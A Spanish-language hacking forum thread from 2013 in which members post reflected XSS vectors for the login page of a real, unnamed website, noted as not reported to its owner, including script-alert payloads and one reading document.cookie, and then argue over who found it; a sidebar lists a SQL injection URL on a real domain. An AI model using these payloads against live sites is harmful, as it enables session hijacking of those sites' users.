send
Grupo de Telegram
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

XSS login.asp

  • 7 Respuestas
  • 3155 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado hdbreaker

  • *
  • Underc0der
  • Mensajes: 412
  • Actividad:
    0%
  • Reputación 0
  • HD_Breaker
    • Ver Perfil
    • Security Signal
    • Email
  • Skype: hdbreaker96
  • Twitter: @SecSignal
« en: Marzo 12, 2013, 12:08:48 am »



Xss Reflected:
Web: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Vector: <script>alert("HD_Breaker")</script>
Reportado: No

PD: un fallo algo raro, que esta dado ya que se muestra escrito en web la sentencia el Usuario "XSS" No existe, de esta forma se puede explotar este tipo de XSS
« Última modificación: Enero 10, 2015, 01:06:22 pm por Expermicid »

Ser Libres es un Privilegio por el cual pocos estamos dispuestos a correr el riesgo

Desconectado Hu0r

  • *
  • Underc0der
  • Mensajes: 37
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #1 en: Marzo 12, 2013, 01:52:26 am »
Buena, he encontrado varias así mismo.

Desconectado Cronos

  • *
  • Underc0der
  • Mensajes: 1000
  • Actividad:
    0%
  • Reputación 1
  • Mientras mas se, me doy cuenta de lo poco que se.
    • Ver Perfil
    • Email
  • Skype: cronos.labs
« Respuesta #2 en: Marzo 12, 2013, 12:45:32 pm »
Yo siempre eh tratado pero no eh encontrado web con esa vulnerabilidad en el login..
Muy bueno, gracias por compartir!
Saludos,, Cronos.-

Desconectado OverHoax

  • *
  • Underc0der
  • Mensajes: 28
  • Actividad:
    0%
  • Reputación 0
  • Gamer - Programmer - Ghat
    • Ver Perfil
    • OverHoax
  • Skype: OverHoax
« Respuesta #3 en: Marzo 12, 2013, 11:03:36 pm »
Xss Reflected

Web = You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Vector = "><script>alert(/MrOverHoax/)</script>
Autor = OverHoax

IFXss

Web = You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Vector = <script>alert(document.cookie)</script>
Autor = OverHoax

Salu2

OverHoax
Nunca rechaces aquellos que te aman o se preocupan por ti. Porque algún día entenderás que perdiste la luna mientras contabas las estrellas

Desconectado hdbreaker

  • *
  • Underc0der
  • Mensajes: 412
  • Actividad:
    0%
  • Reputación 0
  • HD_Breaker
    • Ver Perfil
    • Security Signal
    • Email
  • Skype: hdbreaker96
  • Twitter: @SecSignal
« Respuesta #4 en: Marzo 12, 2013, 11:46:40 pm »
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Xss Reflected

Web = You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Vector = "><script>alert(/MrOverHoax/)</script>
Autor = OverHoax

IFXss

Web = You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Vector = <script>alert(document.cookie)</script>
Autor = OverHoax

Salu2

OverHoax

??? Creo que llegaste tarde bro, el autor de este xss soy yo, por eso lo publique no?

Ser Libres es un Privilegio por el cual pocos estamos dispuestos a correr el riesgo

Desconectado OverHoax

  • *
  • Underc0der
  • Mensajes: 28
  • Actividad:
    0%
  • Reputación 0
  • Gamer - Programmer - Ghat
    • Ver Perfil
    • OverHoax
  • Skype: OverHoax
« Respuesta #5 en: Marzo 13, 2013, 04:22:04 pm »
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Xss Reflected

Web = You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Vector = "><script>alert(/MrOverHoax/)</script>
Autor = OverHoax

IFXss

Web = You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Vector = <script>alert(document.cookie)</script>
Autor = OverHoax

Salu2

OverHoax

??? Creo que llegaste tarde bro, el autor de este xss soy yo, por eso lo publique no?

Se que eres tu, pero pudiste publicarlas todas no solo 1... pero no vi que pusieras el de la IFXss
Nunca rechaces aquellos que te aman o se preocupan por ti. Porque algún día entenderás que perdiste la luna mientras contabas las estrellas

Desconectado hdbreaker

  • *
  • Underc0der
  • Mensajes: 412
  • Actividad:
    0%
  • Reputación 0
  • HD_Breaker
    • Ver Perfil
    • Security Signal
    • Email
  • Skype: hdbreaker96
  • Twitter: @SecSignal
« Respuesta #6 en: Marzo 14, 2013, 01:35:17 am »
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Xss Reflected

Web = You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Vector = "><script>alert(/MrOverHoax/)</script>
Autor = OverHoax

IFXss

Web = You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Vector = <script>alert(document.cookie)</script>
Autor = OverHoax

Salu2

OverHoax

??? Creo que llegaste tarde bro, el autor de este xss soy yo, por eso lo publique no?

Se que eres tu, pero pudiste publicarlas todas no solo 1... pero no vi que pusieras el de la IFXss

No se reportan todos los vectores, se reporta el fallo, XSS, IFxss es una variacion que depende del script inyectado pero sigue haciendo uso de un XSS

Ser Libres es un Privilegio por el cual pocos estamos dispuestos a correr el riesgo

Desconectado Matabarras

  • *
  • Underc0der
  • Mensajes: 129
  • Actividad:
    0%
  • Reputación 0
  • In-Seguridad informática
    • Ver Perfil
  • Skype: Matabarrasfud
« Respuesta #7 en: Marzo 15, 2013, 08:22:30 pm »
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
wow me sorprende tu conocimiento

respeto.

Jajajaajaajajajajaa que Kapo.
No esperes nada, vive la vida, y que los demas hagan lo que ellos creen.

 

¿Te gustó el post? COMPARTILO!



[SQL INJECTION] http://www.idocz.net/Login.php?id='

Iniciado por charly837

Respuestas: 6
Vistas: 2383
Último mensaje Mayo 08, 2014, 03:00:24 pm
por charly837
Login sin Registro Rectorado UTN Bs As

Iniciado por hdbreaker

Respuestas: 0
Vistas: 999
Último mensaje Febrero 20, 2013, 04:34:44 pm
por hdbreaker